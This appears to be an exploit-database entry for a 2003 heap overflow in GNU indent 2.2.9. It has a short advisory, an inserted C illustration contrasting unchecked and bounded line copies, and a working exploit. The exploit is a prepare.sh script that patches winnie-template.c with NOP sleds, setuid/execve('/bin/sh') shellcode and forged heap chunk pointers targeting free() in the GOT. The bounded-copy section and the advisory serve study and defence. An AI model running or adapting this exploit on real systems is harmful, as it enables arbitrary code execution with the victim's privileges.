GNU Indent 2.2.9 – Local Heap Overflow

Vulnerability ID: 1054332    Vulnerability type: (not given)
Published: 2003-12-26    Updated: 2003-12-26
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux    CVSS score: N/A
| Source
https://www.exploit-db.com/exploits/23479
| Vulnerability details
Vulnerability details have not yet been disclosed.
| Exploit
source: http://www.securityfocus.com/bid/9297/info

It has been reported that GNU Indent may be prone to a local heap overflow vulnerability that can be exploited through a malicious C source input file. It has been reported that indent copies data from the file to a 1000 byte long buffer without sufficient boundary checking. A heap overflow condition can be triggered, which may result in memory being overwritten and, ultimately, malicious code execution with the privileges of the user running indent.

GNU Indent version 2.2.9 has been reported to be prone to this issue; however, other versions may be affected as well.
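
The advisory describes an unchecked copy into a fixed 1000-byte buffer. The following is an added illustration, not GNU indent's own source: it places the unchecked copy pattern next to a bounded version that refuses a line that would not fit, and a constructed probe that feeds lines of chosen length to the bounded copy so the boundary can be checked. The buffer size is taken from the advisory; the function names, the enum and the probe inputs are invented for this example.

```c
/* Added illustration (not GNU indent's code): bounded vs unchecked line copy
 * into a fixed 1000-byte buffer. LINE_BUF_SIZE follows the advisory; all
 * function names here are assumptions made for the example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINE_BUF_SIZE 1000

/* Return values of copy_line_bounded() and probe_line_length(). */
enum copy_status { COPY_OK = 0, COPY_TOO_LONG = -1 };

/* The defective pattern: copies up to end of line with no regard for the size
 * of dst. A line of LINE_BUF_SIZE bytes or more writes past the buffer, and
 * when dst is a heap chunk the bytes land in the neighbouring chunk and the
 * allocator's metadata for it. Shown for contrast; only called on a short
 * input in main(). */
void copy_line_unchecked(char *dst, const char *src)
{
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
}

/* The bounded version: checks before every byte that the byte plus the
 * terminating NUL still fit in dst, rejects the line otherwise, and reports
 * the number of bytes copied through out_len (may be NULL). */
int copy_line_bounded(char *dst, size_t dst_size, const char *src, size_t *out_len)
{
    size_t n = 0;
    if (dst_size == 0)
        return COPY_TOO_LONG;
    while (src[n] != '\0' && src[n] != '\n') {
        if (n + 1 >= dst_size) {        /* no room for this byte and the NUL */
            dst[0] = '\0';
            if (out_len) *out_len = 0;
            return COPY_TOO_LONG;
        }
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    if (out_len) *out_len = n;
    return COPY_OK;
}

/* Constructed probe: builds a line of `len` 'A' bytes followed by '\n' (the
 * shape of an over-long token in a crafted input file) and reports whether
 * copy_line_bounded() accepts it into a LINE_BUF_SIZE buffer. */
int probe_line_length(size_t len)
{
    char dst[LINE_BUF_SIZE];
    char *src = malloc(len + 2);
    size_t got = 0;
    int rc;

    if (src == NULL)
        return COPY_TOO_LONG;
    memset(src, 'A', len);
    src[len] = '\n';
    src[len + 1] = '\0';

    rc = copy_line_bounded(dst, sizeof dst, src, &got);
    free(src);
    /* An accepted line must have been copied whole and NUL-terminated. */
    if (rc == COPY_OK && (got != len || strlen(dst) != len))
        return COPY_TOO_LONG;
    return rc;
}

int main(void)
{
    char small[LINE_BUF_SIZE];
    /* Safe only because this constructed input is far shorter than the buffer. */
    copy_line_unchecked(small, "int x;\n");
    printf("unchecked copy of a short line: \"%s\"\n", small);
    printf("999-byte line:  %s\n", probe_line_length(999) == COPY_OK ? "accepted" : "rejected");
    printf("1000-byte line: %s\n", probe_line_length(1000) == COPY_OK ? "accepted" : "rejected");
    printf("5000-byte line: %s\n", probe_line_length(5000) == COPY_OK ? "accepted" : "rejected");
    return 0;
}
```

The check sits inside the loop rather than after it because the decision has to be made before the first out-of-bounds byte is written; a length check on the whole line beforehand works too, but only when the input length is known up front, which a byte-at-a-time reader does not have.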

-------------------------------------prepare.sh--------------------------------------------

#!/bin/sh

# these addresses are working on indent 2.2.9 from
# slackware 9.0

# what_to_write
#
# it should be 2bytes aligned because it have to
# point to one of \xeb from jmps. If it points
# to \x08 - exploitation will fail
FD=`echo -e "\x40\xa4\x05\x08"`

# where_to_write-0x8
#
# it is good idea to point it to free() field in GOT
BK=`echo -e "\xc0\x7d\x05\x08"`

# change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes)
sed -e "s/JP/`echo -e "\xeb\x08"`/g" winnie-template.c > temp.c

# change all 'N' to \x90 (NOP)
sed -e "s/NNNNNNNNNNNNNNN/`echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"`/" temp.c > winnie.c

# change 'S's to shellcode
sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh"`/" winnie.c > temp.c

# exploit with this shellcode is quite useless, because
# it is simple execve(shell) shellcode. If you want to
# change shellcode, first prepare winnie-template.c -
# change 'SSSS...' len to len of your new shellcode,
# but len of whole 'JP...NNN...SSS' should remain the same.
# You can remove few 'JP's. You have to leave few NOPs
# before shellcode, because one of jmp's will land in them
# (this is to be sure that no jmp will land in the middle
# of shellcode. When you changed template, change sed line
# above - change 'SSSS...' len and shellcode.


# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4)
sed -e "s/dddd/`echo -e "\xfc\xff\xff\xff"`/" temp.c > winnie.c
sed -e "s/eeee/`echo -e "\xfc\xff\xff\xff"`/" winnie.c > temp.c
sed -e "s/ffff/`echo -e "\xfc\xff\xff\xff"`/" temp.c > winnie.c

# change 'gggg' to FD (what_to_write)
sed -e "s/gggg/$FD/" winnie.c > temp.c

# change 'hhhh' to BK (where_to_write-8)
sed -e "s/hhhh/$BK/" temp.c > winnie.c

# 'iiii' is prev_size, but we don't need to change it
# Left it untouched

# change 'jjjj' to 0xfffffff1 (size field, pointing to these
# three (-4))
sed -e "s/jjjj/`echo -e "\xf1\xff\xff\xff"`/" winnie.c > temp.c

# change 'llll' to some readable value (on stack for example)
# it is 'next' field of overwritten buf_break_list struct
sed -e "s/llll/`echo -e "\x40\xff\xff\xbf"`/" temp.c > winnie.c

rm temp.c

-------------------------------------winnie-template.c--------------------------------------------

#include <stdio.h>

int main(int argc, char **argv)
{
    printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n"
           "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1ty\n");

    /* the placeholder strings below are rewritten by prepare.sh:
       JP -> relative jmp, N -> NOP, S -> shellcode, dddd..llll -> chunk fields */
    asm
        (
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "jmp continue\n"
        ".string \"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n"
        ".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n"
        "continue:\n"
        "nop\n"
        "nop\n"
        :);
    return 0;
}
